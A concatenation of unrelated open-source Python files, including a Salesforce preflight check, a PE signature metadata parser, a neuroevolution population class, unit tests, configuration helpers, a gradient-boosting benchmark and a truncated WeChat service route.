task_options = {
"settings_type": {
"description": "The API name of the Settings entity to be checked, such as ChatterSettings.",
"required": True,
},
"settings_field": {
"description": "The API name of the field on the Settings entity to check.",
"required": True,
},
"value": {"description": "The value to check for", "required": True},
"treat_missing_as_failure": {
"description": "If True, treat a missing Settings entity as a preflight failure, instead of raising an exception. Defaults to False.",
"required": False,
},
}
def _run_task(self):
field = self.options["settings_field"]
entity = self.options["settings_type"]
try:
results = self.tooling.query(f"SELECT {field} FROM {entity}")["records"]
except SalesforceMalformedRequest as e:
self.logger.error(
f"The settings value {entity}.{field} could not be queried: {e}"
)
self.return_values = False
if not process_bool_arg(
self.options.get("treat_missing_as_failure", False)
):
raise e
return
if not results:
self.logger.info(
"Located no Settings records. Returning negative preflight result."
)
self.return_values = False
return
value = results[0].get(self.options["settings_field"])
# Type-sensitive compare.
if type(value) is bool:
comparand = process_bool_arg(self.options["value"])
elif type(value) is float:
comparand = float(self.options["value"])
elif type(value) is int:
comparand = int(self.options["value"])
else:
comparand = self.options["value"]
self.return_values = value == comparand
self.logger.info(
f"Completed Settings preflight check with result {self.return_values}"
)
|
fsf-server/modules/META_PE_SIGNATURE.py | akniffe1/fsf | 259 | 12653364 | <filename>fsf-server/modules/META_PE_SIGNATURE.py
#!/usr/bin/env python
#
# Author: <NAME>
# Description: Get metadata on the signature used to sign a PE file
# Date: 11/17/2015
#
# Good resources:
# * https://www.cs.auckland.ac.nz/~pgut001/pubs/authenticode.txt
# * http://erny-rev.blogspot.com/2013/10/parsing-x509v3-certificates-and-pkcs7.html
# * http://pyasn1.sourceforge.net/
# * https://msdn.microsoft.com/en-us/windows/hardware/gg463180.aspx
'''
Copyright 2015 Emerson Electric Co.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import sys
import pefile
import struct
from datetime import datetime
from pyasn1.codec.der.decoder import decode
from pyasn1_modules import rfc2315
# Reference: https://msdn.microsoft.com/en-us/library/ff635603.aspx
def hash_alg_oid_mapping():
db = {}
db['1.2.840.113549.1.1.5'] = 'sha1RSA'
db['1.2.840.113549.1.1.4'] = 'md5RSA'
db['1.2.840.10040.4.3'] = 'sha1DSA'
db['1.3.14.3.2.29'] = 'sha1RSA'
db['1.3.14.3.2.15'] = 'shaRSA'
db['1.3.14.3.2.3'] = 'md5RSA'
db['1.2.840.113549.1.1.2'] = 'md2RSA'
db['1.2.840.113549.1.1.3'] = 'md4RSA'
db['1.3.14.3.2.2'] = 'md4RSA'
db['1.3.14.3.2.4'] = 'md4RSA'
db['1.3.14.7.2.3.1'] = 'md2RSA'
db['1.3.14.3.2.13'] = 'sha1DSA'
db['1.3.14.3.2.27'] = 'dsaSHA1'
db['2.16.840.1.101.2.1.1.19'] = 'mosaicUpdatedSig'
db['1.3.14.3.2.26'] = 'sha1NoSign'
db['1.2.840.113549.2.5'] = 'md5NoSign'
db['2.16.840.1.101.3.4.2.1'] = 'sha256NoSign'
db['2.16.840.1.101.3.4.2.2'] = 'sha384NoSign'
db['2.16.840.1.101.3.4.2.3'] = 'sha512NoSign'
db['1.2.840.113549.1.1.11'] = 'sha256RSA'
db['1.2.840.113549.1.1.12'] = 'sha384RSA'
db['1.2.840.113549.1.1.13'] = 'sha512RSA'
db['1.2.840.113549.1.1.10'] = 'RSASSA-PSS'
db['1.2.840.10045.4.1'] = 'sha1ECDSA'
db['1.2.840.10045.4.3.2'] = 'sha256ECDSA'
db['1.2.840.10045.4.3.3'] = 'sha384ECDSA'
db['1.2.840.10045.4.3.4'] = 'sha512ECDSA'
db['1.2.840.10045.4.3'] = 'specifiedECDSA'
return db
# Reference: https://msdn.microsoft.com/en-us/library/windows/desktop/aa386991(v=vs.85).aspx
def rdn_oid_mapping():
db = {}
db['2.5.4.3'] = 'CN'
db['2.5.4.5'] = 'DeviceSerialNumber'
db['2.5.4.6'] = 'C'
db['2.5.4.7'] = 'L'
db['2.5.4.8'] = 'ST'
db['2.5.4.10'] = 'O'
db['2.5.4.11'] = 'OU'
db['1.2.840.113549.1.9.1'] = 'E'
return db
def get_cert_info(signed_data):
PARENT_CERT_INFO = {}
rdn_mapping = rdn_oid_mapping()
hash_mapping = hash_alg_oid_mapping()
cert_count = 0
for c in signed_data['certificates']:
CERT_INFO = {}
cer = c['certificate']['tbsCertificate']
CERT_INFO['Version'] = cer['version'].prettyPrint()[1:-1] # the [1:-1] is a fun way to get rid of double quotes
CERT_INFO['Algorithm'] = hash_mapping[cer['signature']['algorithm'].prettyPrint()]
# Had do get creative here with the formatting..
serial = '%.02x' % int(cer['serialNumber'].prettyPrint())
# Append a zero to the front if we have an odd number of hex digits
serial = '0' + serial if len(serial) % 2 != 0 else serial
# Finally, apply our colon in between the hex bytes
serial = ':'.join(serial[i:i+2] for i in range(0, len(serial), 2))
CERT_INFO['Serial'] = serial
CERT_INFO['Validity'] = { 'Not Before' : datetime.strptime(str(cer['validity']['notBefore']['utcTime']), '%y%m%d%H%M%SZ').strftime("%Y-%m-%d %H:%M:%S UTC"),
'Not After' : datetime.strptime(str(cer['validity']['notAfter']['utcTime']), '%y%m%d%H%M%SZ').strftime("%Y-%m-%d %H:%M:%S UTC") }
subject = cer['subject']
issuer = cer['issuer']
rdnsequence = subject[0]
CERT_INFO['Subject'] = []
for rdn in rdnsequence:
oid, value = rdn[0]
if oid.prettyPrint() in rdn_mapping:
CERT_INFO['Subject'].append('%s=%s' % (rdn_mapping[oid.prettyPrint()], str(value[2:])))
rdnsequence = issuer[0]
CERT_INFO['Issuer'] = []
for rdn in rdnsequence:
oid, value = rdn[0]
if oid.prettyPrint() in rdn_mapping:
CERT_INFO['Issuer'].append('%s=%s' % (rdn_mapping[oid.prettyPrint()], str(value[2:])))
PARENT_CERT_INFO['Cert_%s' % cert_count] = CERT_INFO
cert_count += 1
return PARENT_CERT_INFO
def META_PE_SIGNATURE(s, buff):
sig_buff = []
pe = pefile.PE(data=buff)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
# Eight bytes in due to the struct spec
# typedef struct _WIN_CERTIFICATE
# {
# DWORD dwLength;
# WORD wRevision;
# WORD wCertificateType;
# BYTE bCertificate[ANYSIZE_ARRAY];
# } WIN_CERTIFICATE, *LPWIN_CERTIFICATE;
sig_buff = buff[address + 8 : address + 8 + size]
# Remove sequence and objid structures, 19 bytes
signed_data, rest = decode(sig_buff[19:], asn1Spec=rfc2315.SignedData())
return get_cert_info(signed_data)
if __name__ == '__main__':
print META_PE_SIGNATURE(None, sys.stdin.read())
|
tfne/populations/codeepneat/codeepneat_population.py | githealthy18/Tensorflow-Neuroevolution | 121 | 12653374 | import statistics
from ..base_population import BasePopulation
class CoDeepNEATPopulation(BasePopulation):
"""
Population class of the CoDeepNEAT algorithm that holds all relevant population information in a single place to
ease summary, serialization and deserialization.
"""
def __init__(self, initial_state=None):
"""
Initializes all variables of a CoDeepNEAT population either to None/default values or to an initial state if
such is supplied (usually when deserializing population)
@param initial_state: dict object holding keys and values to all population variables
"""
# Declare internal variables of the CoDeepNEAT population
self.generation_counter = None
self.best_genome = None
self.best_fitness = None
# Declare and initialize internal variables concerning the module population of the CoDeepNEAT algorithm
self.modules = dict()
self.mod_species = dict()
self.mod_species_repr = dict()
self.mod_species_fitness_history = dict()
self.mod_species_counter = 0
# Declare and initialize internal variables concerning the blueprint population of the CoDeepNEAT algorithm
self.blueprints = dict()
self.bp_species = dict()
self.bp_species_repr = dict()
self.bp_species_fitness_history = dict()
self.bp_species_counter = 0
# If an initial state is supplied, then the population was deserialized. Recreate this initial state.
if initial_state is not None:
self.generation_counter = initial_state['generation_counter']
self.best_genome = initial_state['best_genome']
self.best_fitness = initial_state['best_fitness']
self.modules = initial_state['modules']
self.mod_species = initial_state['mod_species']
self.mod_species_repr = initial_state['mod_species_repr']
self.mod_species_fitness_history = initial_state['mod_species_fitness_history']
self.mod_species_counter = initial_state['mod_species_counter']
self.blueprints = initial_state['blueprints']
self.bp_species = initial_state['bp_species']
self.bp_species_repr = initial_state['bp_species_repr']
self.bp_species_fitness_history = initial_state['bp_species_fitness_history']
self.bp_species_counter = initial_state['bp_species_counter']
def summarize_population(self):
"""
Prints the current state of all CoDeepNEAT population variables to stdout in a formatted and clear manner
"""
# Determine average fitness of all blueprints
bp_fitness_list = [self.blueprints[bp_id].get_fitness() for bp_id in self.blueprints]
blueprints_avg_fitness = round(statistics.mean(bp_fitness_list), 4)
# Determine best id of each blueprint species
bp_species_best_id = dict()
for spec_id, spec_bp_ids in self.bp_species.items():
spec_bp_ids_sorted = sorted(spec_bp_ids, key=lambda x: self.blueprints[x].get_fitness(), reverse=True)
bp_species_best_id[spec_id] = spec_bp_ids_sorted[0]
# Determine average fitness of all modules
mod_fitness_list = [self.modules[mod_id].get_fitness() for mod_id in self.modules]
modules_avg_fitness = round(statistics.mean(mod_fitness_list), 4)
# Determine best id of each module species
mod_species_best_id = dict()
for spec_id, spec_mod_ids in self.mod_species.items():
spec_mod_ids_sorted = sorted(spec_mod_ids, key=lambda x: self.modules[x].get_fitness(), reverse=True)
mod_species_best_id[spec_id] = spec_mod_ids_sorted[0]
# Print summary header
print("\n\n\n\033[1m{} Population Summary {}\n\n"
"Generation: {:>4} || Best Genome Fitness: {:>8} || Avg Blueprint Fitness: {:>8} || "
"Avg Module Fitness: {:>8}\033[0m\n"
"Best Genome: {}\n"
.format('#' * 60,
'#' * 60,
self.generation_counter,
self.best_fitness,
blueprints_avg_fitness,
modules_avg_fitness,
self.best_genome))
# Print summary of blueprint species
print("\033[1mBlueprint Species || Blueprint Species Avg Fitness || Blueprint Species Size\033[0m")
for spec_id, spec_fitness_hisotry in self.bp_species_fitness_history.items():
print("{:>6} || {:>8} || {:>8}"
.format(spec_id,
spec_fitness_hisotry[self.generation_counter],
len(self.bp_species[spec_id])))
print(f"Best BP of Species {spec_id} || {self.blueprints[bp_species_best_id[spec_id]]}")
# Print summary of module species
print("\n\033[1mModule Species || Module Species Avg Fitness || Module Species Size\033[0m")
for spec_id, spec_fitness_hisotry in self.mod_species_fitness_history.items():
print("{:>6} || {:>8} || {:>8}"
.format(spec_id,
spec_fitness_hisotry[self.generation_counter],
len(self.mod_species[spec_id])))
print(f"Best Mod of Species {spec_id} || {self.modules[mod_species_best_id[spec_id]]}")
# Print summary footer
print("\n\033[1m" + '#' * 142 + "\033[0m\n")
def serialize(self) -> dict:
"""
Serializes all CoDeepNEAT population variables to a json compatible dictionary and returns it
@return: serialized population variables as a json compatible dict
"""
# Serialize all modules
serialized_modules = dict()
for mod_id, module in self.modules.items():
serialized_modules[mod_id] = module.serialize()
# Serialize all blueprints
serialized_blueprints = dict()
for bp_id, blueprint in self.blueprints.items():
serialized_blueprints[bp_id] = blueprint.serialize()
# Use serialized module and blueprint population and extend it by population internal evolution information
serialized_population = {
'population_type': 'CoDeepNEAT',
'generation_counter': self.generation_counter,
'modules': serialized_modules,
'mod_species': self.mod_species,
'mod_species_repr': self.mod_species_repr if self.mod_species_repr else None,
'mod_species_fitness_history': self.mod_species_fitness_history,
'mod_species_counter': self.mod_species_counter,
'blueprints': serialized_blueprints,
'bp_species': self.bp_species,
'bp_species_repr': self.bp_species_repr if self.bp_species_repr else None,
'bp_species_fitness_history': self.bp_species_fitness_history,
'bp_species_counter': self.bp_species_counter,
'best_genome': self.best_genome.serialize(),
'best_fitness': self.best_fitness
}
return serialized_population
|
mmt/loss/__init__.py | ChienHsuan/MMT | 425 | 12653381 | from __future__ import absolute_import
from .triplet import TripletLoss, SoftTripletLoss
from .crossentropy import CrossEntropyLabelSmooth, SoftEntropy
__all__ = [
'TripletLoss',
'CrossEntropyLabelSmooth',
'SoftTripletLoss',
'SoftEntropy'
]
|
tests/unit/pytorch/distributions/test_deterministic.py | chiragnagpal/probflow | 134 | 12653405 | import numpy as np
import pytest
import torch
from probflow.distributions import Deterministic
from probflow.utils.torch_distributions import get_TorchDeterministic
tod = torch.distributions
def is_close(a, b, tol=1e-3):
return np.abs(a - b) < tol
def test_TorchDeterministic():
"""Tests the TorchDeterministic distribution"""
TorchDeterministic = get_TorchDeterministic()
dist = TorchDeterministic(loc=torch.tensor([2.0]), validate_args=True)
assert is_close(dist.mean.numpy()[0], 2.0)
assert is_close(dist.stddev, 0.0)
assert is_close(dist.variance, 0.0)
dist.expand([5, 2])
dist.rsample()
dist.log_prob(torch.tensor([1.0]))
dist.cdf(torch.tensor([1.0]))
dist.icdf(torch.tensor([1.0]))
dist.entropy()
def test_Deterministic():
"""Tests Deterministic distribution"""
# Create the distribution
dist = Deterministic()
# Check default params
assert dist.loc == 0
# Call should return backend obj
assert isinstance(dist(), tod.distribution.Distribution)
# Test methods
assert dist.prob(torch.zeros([1])).numpy() == 1.0
assert dist.prob(torch.ones([1])).numpy() == 0.0
assert dist.log_prob(torch.zeros([1])).numpy() == 0.0
assert dist.log_prob(torch.ones([1])).numpy() == -np.inf
assert dist.mean().numpy() == 0.0
# Test sampling
samples = dist.sample()
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 0
samples = dist.sample(10)
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 1
assert samples.shape[0] == 10
samples = dist.sample(torch.tensor([10]))
assert isinstance(samples, torch.Tensor)
assert samples.ndim == 1
assert samples.shape[0] == 10
# Should be able to set params
dist = Deterministic(loc=2)
assert dist.loc == 2
assert dist.prob(2 * torch.ones([1])).numpy() == 1.0
assert dist.prob(torch.ones([1])).numpy() == 0.0
# But only with Tensor-like objs
with pytest.raises(TypeError):
dist = Deterministic(loc="lalala")
|
tests/test_bitmap.py | sylencecc/spamscope | 252 | 12653407 | <filename>tests/test_bitmap.py<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2016 <NAME> (https://www.linkedin.com/in/fmantuano/)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import unittest
from context import bitmap
PhishingBitMap = bitmap.PhishingBitMap
logging.getLogger().addHandler(logging.NullHandler())
class ValidBitMap(bitmap.BitMap):
_map_name = "valid_bitmap"
def define_bitmap(self):
self._bitmap = {
"property_0": 0,
"property_1": 1,
"property_2": 2,
}
class InValidBitMap(bitmap.BitMap):
_map_name = "invalid_bitmap"
def define_bitmap(self):
self._bitmap = {
"property_0": 0,
# "property_1": 1,
"property_2": 2,
}
class MissingBitMap(bitmap.BitMap):
_map_name = "missing_bitmap"
def define_bitmap(self):
self._notbitmap = {
"property_0": 0,
"property_1": 1,
"property_2": 2,
}
class TestBitMap(unittest.TestCase):
bm = ValidBitMap()
def test_valid_map(self):
self.assertRaises(
bitmap.BitMapNotValid,
InValidBitMap,
)
def test_missing_map(self):
self.assertRaises(
bitmap.BitMapNotDefined,
MissingBitMap,
)
def test_reset_score(self):
self.assertEqual(self.bm.score, 0)
self.bm.reset_score()
self.assertEqual(self.bm.score, 0)
self.score = 0
self.assertEqual(self.bm.score, 0)
def test_score(self):
with self.assertRaises(bitmap.ScoreOutOfRange):
self.bm.score = 10
self.assertEqual(self.bm.score, 0)
self.bm.score = 4
self.assertEqual(self.bm.score, 4)
def test_map_name(self):
self.assertEqual(self.bm.map_name, "valid_bitmap")
self.bm.map_name = "new_bitmap"
self.assertEqual(self.bm.map_name, "new_bitmap")
def test_set_unset(self):
self.bm.reset_score()
self.bm.set_property_score('property_2')
self.assertEqual(self.bm.score, 4)
self.bm.unset_property_score('property_2')
self.assertEqual(self.bm.score, 0)
self.bm.set_property_score('property_0')
self.bm.set_property_score('property_1')
self.bm.set_property_score('property_2')
self.assertEqual(self.bm.score, 7)
self.bm.unset_property_score('property_0')
self.assertEqual(self.bm.score, 6)
self.bm.unset_property_score('property_1')
self.assertEqual(self.bm.score, 4)
self.bm.unset_property_score('property_2')
self.assertEqual(self.bm.score, 0)
self.bm.set_property_score(
'property_0',
'property_1',
'property_2',
)
self.assertEqual(self.bm.score, 7)
self.bm.unset_property_score(
'property_0',
'property_1',
'property_2',
)
self.assertEqual(self.bm.score, 0)
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.set_property_score('property_fake')
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.unset_property_score('property_fake')
def test_score_properties(self):
self.bm.reset_score()
self.assertEqual(self.bm.score_properties, [])
self.assertIsInstance(self.bm.score_properties, list)
self.bm.score = 7
properties = ['property_2', 'property_1', 'property_0']
self.assertEqual(self.bm.score_properties, properties)
def test_calculate_score(self):
self.bm.reset_score()
score = self.bm.calculate_score(
# 'property_0',
'property_1',
'property_2',
)
self.assertEqual(score, 6)
with self.assertRaises(bitmap.PropertyDoesNotExists):
self.bm.calculate_score(
'property_fake',
)
def test_score_sum(self):
self.bm.reset_score()
score = self.bm.get_score_sum(2, 1, 0)
self.assertEqual(score, 7)
def test_phishing_bitmap(self):
phishing_bitmap = PhishingBitMap()
max_score = phishing_bitmap.calculate_score(
"mail_body",
"urls_body",
"text_attachments",
"urls_attachments",
"filename_attachments",
"mail_from",
"mail_subject",
)
self.assertEqual(max_score, 127)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
tests/test_blending_range.py | andrewvaliente/pytoshop | 106 | 12653412 | <filename>tests/test_blending_range.py
# -*- coding: utf-8 -*-
import pytest
from pytoshop import blending_range
def _test_default_blending_range(b):
assert b.black0 == 0
assert b.black1 == 0
assert b.white0 == 0
assert b.white1 == 0
def test_default_blending_range():
b = blending_range.BlendingRange()
_test_default_blending_range(b)
b.black0 = 1
b.black1 = 2
b.white0 = 3
b.white1 = 4
assert b.black0 == 1
assert b.black1 == 2
assert b.white0 == 3
assert b.white1 == 4
def test_default_blending_range_pair():
pair = blending_range.BlendingRangePair()
_test_default_blending_range(pair.src)
_test_default_blending_range(pair.dst)
with pytest.raises(TypeError):
pair.src = None
with pytest.raises(TypeError):
pair.dst = None
pair.src = pair.dst
|
api/base/graphql.py | RyanNoelk/OpenEats | 113 | 12653413 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import unicode_literals
from django.conf import settings
from graphene import ObjectType, Field, Schema
from graphene_django.debug import DjangoDebug
from v1.recipe.schema import RecipeQuery, RecipeMutations
from v1.recipe_groups.schema import RecipeGroupQuery, RecipeGroupMutations
from v1.ingredient.schema import IngredientQuery, IngredientMutations
from v1.list.schema import ListQuery, ListMutations
# GraphQl implementation
# TODO: all our this queries are not 100% ready.
# There is a bare bones struture ready to go.
# When the frontend is getting refractored,
# we will switch everything over to GraphQl
class Query(
RecipeQuery,
RecipeGroupQuery,
IngredientQuery,
ListQuery,
ObjectType,
):
if settings.DEBUG:
debug = Field(DjangoDebug, name='__debug')
class Mutation(
# RecipeMutations,
# RecipeGroupMutations,
# IngredientMutations,
ListMutations,
ObjectType
):
if settings.DEBUG:
debug = Field(DjangoDebug, name='__debug')
schema = Schema(query=Query, mutation=Mutation)
|
lib/pymedphys/_streamlit/apps/metersetmap/_config.py | ethanio12345/pymedphys | 207 | 12653427 | <reponame>ethanio12345/pymedphys<filename>lib/pymedphys/_streamlit/apps/metersetmap/_config.py
# Copyright (C) 2020-2021 Cancer Care Associates
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pathlib
from pymedphys._imports import streamlit as st
import pymedphys
from pymedphys._streamlit.utilities import config as st_config
HERE = pathlib.Path(__file__).parent
def config_on_disk():
return None
def config_in_current_directory():
return HERE
@st.cache
def download_demo_files():
cwd = pathlib.Path.cwd()
pymedphys.zip_data_paths("metersetmap-gui-e2e-data.zip", extract_directory=cwd)
return cwd.joinpath("pymedphys-gui-demo")
CONFIG_OPTIONS = {
"Config on Disk": config_on_disk,
"File Upload/Download Only": config_in_current_directory,
"Demo Data": download_demo_files,
}
def get_config(config_mode):
path = CONFIG_OPTIONS[config_mode]()
return st_config.get_config(path)
@st.cache
def get_dicom_export_locations(config):
site_directories = st_config.get_site_directories(config)
dicom_export_locations = {
site: directories["monaco"].parent.parent.joinpath("DCMXprtFile")
for site, directories in site_directories.items()
}
return dicom_export_locations
@st.cache
def get_icom_live_stream_directories(config):
icom_live_stream_directories = {}
for site in config["site"]:
icom_live_base_directory = pathlib.Path(site["export-directories"]["icom_live"])
for linac in site["linac"]:
icom_live_stream_directories[linac["name"]] = str(
icom_live_base_directory.joinpath(linac["ip"])
)
return icom_live_stream_directories
@st.cache
def get_machine_centre_map(config):
machine_centre_map = {}
for site in config["site"]:
for linac in site["linac"]:
machine_centre_map[linac["name"]] = site["name"]
return machine_centre_map
def _get_alias_with_fallback(site_mosaiq_config):
try:
return site_mosaiq_config["alias"]
except KeyError:
pass
try:
port = site_mosaiq_config["port"]
except KeyError:
port = 1433
return f"{site_mosaiq_config['hostname']}:{port}"
@st.cache
def get_mosaiq_details(config):
mosaiq_details = {
site["name"]: {
"timezone": site["mosaiq"]["timezone"],
"server": {
"hostname": site["mosaiq"]["hostname"],
"port": site["mosaiq"]["port"],
"alias": _get_alias_with_fallback(site["mosaiq"]),
},
}
for site in config["site"]
}
return mosaiq_details
@st.cache
def get_default_icom_directories(config):
default_icom_directory = config["icom"]["patient_directories"]
return default_icom_directory
@st.cache
def get_default_gamma_options(config):
default_gamma_options = config["gamma"]
return default_gamma_options
@st.cache
def get_logfile_root_dir(config):
logfile_root_dir = pathlib.Path(config["trf_logfiles"]["root_directory"])
return logfile_root_dir
@st.cache
def get_indexed_backups_directory(config):
logfile_root_dir = get_logfile_root_dir(config)
indexed_backups_directory = logfile_root_dir.joinpath("diagnostics/already_indexed")
return indexed_backups_directory
@st.cache
def get_indexed_trf_directory(config):
logfile_root_dir = get_logfile_root_dir(config)
indexed_trf_directory = logfile_root_dir.joinpath("indexed")
return indexed_trf_directory
def get_gamma_options(config, advanced_mode):
default_gamma_options = get_default_gamma_options(config)
if advanced_mode:
st.sidebar.markdown(
"""
# Gamma parameters
"""
)
result = {
**default_gamma_options,
**{
"dose_percent_threshold": st.sidebar.number_input(
"MU Percent Threshold",
value=default_gamma_options["dose_percent_threshold"],
),
"distance_mm_threshold": st.sidebar.number_input(
"Distance (mm) Threshold",
value=default_gamma_options["distance_mm_threshold"],
),
"local_gamma": st.sidebar.checkbox(
"Local Gamma", default_gamma_options["local_gamma"]
),
"max_gamma": st.sidebar.number_input(
"Max Gamma", value=default_gamma_options["max_gamma"]
),
},
}
else:
result = default_gamma_options
return result
|
rdkit/DataStructs/UnitTestTopNContainer.py | kazuyaujihara/rdkit | 1,609 | 12653432 | <filename>rdkit/DataStructs/UnitTestTopNContainer.py
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import random
import unittest
from io import StringIO
from rdkit.DataStructs.TopNContainer import TopNContainer, _exampleCode
from rdkit.TestRunner import redirect_stdout
class TestCase(unittest.TestCase):
def test1(self):
# simple test with a known answer
cont = TopNContainer(4)
for foo in range(10):
cont.Insert(foo, str(foo))
assert cont.GetPts() == list(range(6, 10))
assert cont.GetExtras() == [str(x) for x in range(6, 10)]
def test2(self):
# larger scale random test
cont = TopNContainer(50)
for _ in range(1000):
cont.Insert(random.random())
vs = cont.GetPts()
last = vs.pop(0)
while vs:
assert vs[0] >= last
last = vs.pop(0)
def test3(self):
# random test with extras
cont = TopNContainer(10)
for _ in range(100):
v = random.random()
cont.Insert(v, v + 1)
vs = cont.GetExtras()
last = vs.pop(0)
while vs:
assert vs[0] >= last
last = vs.pop(0)
def test4(self):
# random test with extras and getitem
cont = TopNContainer(10)
for i in range(100):
v = random.random()
cont.Insert(v, v + 1)
lastV, lastE = cont[0]
for i in range(1, len(cont)):
v, e = cont[i]
assert v >= lastV
assert e >= lastE
lastV, lastE = v, e
def test5(self):
# random test with extras and getitem, include reverse
cont = TopNContainer(10)
for i in range(100):
v = random.random()
cont.Insert(v, v + 1)
cont.reverse()
lastV, lastE = cont[0]
for i in range(1, len(cont)):
v, e = cont[i]
assert v <= lastV
assert e <= lastE
lastV, lastE = v, e
def test_keepAll(self):
# simple test with a known answer where we keep all
cont = TopNContainer(-1)
for i in range(10):
cont.Insert(9 - i, str(9 - i))
self.assertEqual(len(cont), i + 1)
assert cont.GetPts() == list(range(10))
assert cont.GetExtras() == [str(x) for x in range(10)]
def test_exampleCode(self):
# We make sure that the example code runs
f = StringIO()
with redirect_stdout(f):
_exampleCode()
s = f.getvalue()
self.assertIn('[58, 75, 78, 84]', s)
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
crates/tree/benchmarks/boston.py | OneToolsCollection/tangramdotdev-tangram | 957 | 12653441 | <reponame>OneToolsCollection/tangramdotdev-tangram
from pandas.api.types import CategoricalDtype
from sklearn.metrics import mean_squared_error
import argparse
import numpy as np
import pandas as pd
import json
parser = argparse.ArgumentParser()
parser.add_argument('--library', choices=['h2o', 'lightgbm', 'sklearn', 'xgboost', 'catboost'], required=True)
args = parser.parse_args()
# Load the data.
path_train = 'data/boston_train.csv'
path_test = 'data/boston_test.csv'
target_column_name = "medv"
chas_options = ["0", "1"]
dtype = {
'crim': np.float64,
'zn': np.float64,
'indus': np.float64,
'chas': CategoricalDtype(categories=chas_options),
'nox': np.float64,
'rm': np.float64,
'age': np.float64,
'dis': np.float64,
'rad': np.int64,
'tax': np.float64,
'ptratio': np.float64,
'b': np.float64,
'lstat': np.float64,
}
data_train = pd.read_csv(path_train, dtype=dtype)
data_test = pd.read_csv(path_test, dtype=dtype)
if args.library == 'xgboost' or args.library == 'sklearn' or args.library == 'catboost':
categorical_columns = data_train.select_dtypes(['category']).columns
data_train.loc[:, categorical_columns] = data_train.loc[:, categorical_columns].apply(lambda x: x.cat.codes)
data_test.loc[:, categorical_columns] = data_test.loc[:, categorical_columns].apply(lambda x: x.cat.codes)
labels_train = data_train.pop(target_column_name)
features_train = data_train
labels_test = data_test.pop(target_column_name)
features_test = data_test
# Train the model.
if args.library == 'h2o':
import h2o
from h2o.estimators import H2OGradientBoostingEstimator
h2o.init()
data_train = pd.concat([features_train, labels_train], axis=1)
data_test = pd.concat([features_test, labels_test], axis=1)
data_train = h2o.H2OFrame(python_obj=data_train)
data_test = h2o.H2OFrame(python_obj=data_test)
feature_column_names = [column for column in data_train.columns if column != target_column_name]
model = H2OGradientBoostingEstimator(
distribution="gaussian",
learn_rate=0.1,
ntrees=100,
)
model.train(
training_frame=data_train,
y=target_column_name,
x=feature_column_names,
)
elif args.library == 'lightgbm':
import lightgbm as lgb
model = lgb.LGBMRegressor(
learning_rate=0.1,
n_estimators=100,
num_leaves=255,
)
model.fit(features_train, labels_train)
elif args.library == 'sklearn':
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingRegressor
model = HistGradientBoostingRegressor(
learning_rate=0.1,
max_iter=100,
max_leaf_nodes=255,
validation_fraction=None,
)
model.fit(features_train, labels_train)
elif args.library == 'xgboost':
import xgboost as xgb
model = xgb.XGBRegressor(
eta=0.1,
eval_metric='logloss',
grow_policy='lossguide',
max_leaves=255,
n_estimators=100,
tree_method='hist',
use_label_encoder=False,
)
model.fit(features_train, labels_train)
elif args.library == 'catboost':
from catboost import CatBoostRegressor
model = CatBoostRegressor(
grow_policy='Lossguide',
learning_rate=0.1,
n_estimators=100,
num_leaves=255,
train_dir='data/catboost_info',
verbose=False
)
model.fit(features_train, labels_train, silent=True)
# Make predictions on the test data.
if args.library == 'h2o':
predictions = model.predict(data_test).as_data_frame()
else:
predictions = model.predict(features_test)
# Compute metrics.
mse = mean_squared_error(predictions, labels_test)
print(json.dumps({
'mse': mse,
}))
|
Recycled/wechatservice/route.py | lifg2000/StockAnalysisSystem | 138 | 12653460 | <reponame>lifg2000/StockAnalysisSystem
import time
import hashlib
from flask import request
from .wechat import WeChat
from StockAnalysisSystem.core.config import Config
wechat: WeChat = None
SasUserWxUserDict = {
}
WxUserSasUserDict = {
}
# ----------------------------------------------------------------------------------------------------------------------
def handle_cmd_test(parameters: str, flask_request: request, msg_dict: dict) -> str:
wechat_user = msg_dict.get('FromUserName', '')
if wechat_user not in WxUserSasUserDict.keys():
return ''
user_mgr = wechat.get_user_manager()
user_lst = user_mgr.get_user_list()
if len(user_lst) > 0:
wechat.send_user_message(user_lst[0], 'Hello from Sleepy')
return 'Test Execute Done'
def handle_cmd_login(parameters: str, flask_request: request, msg_dict: dict) -> str:
parts = parameters.split(',')
username = (parts[0] if len(parts) > 0 else '').strip()
password = (parts[1] if len(parts) > 1 else '').strip()
passwd_sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()
if username == 'Sleepy' and passwd_<PASSWORD>1 == '<PASSWORD>':
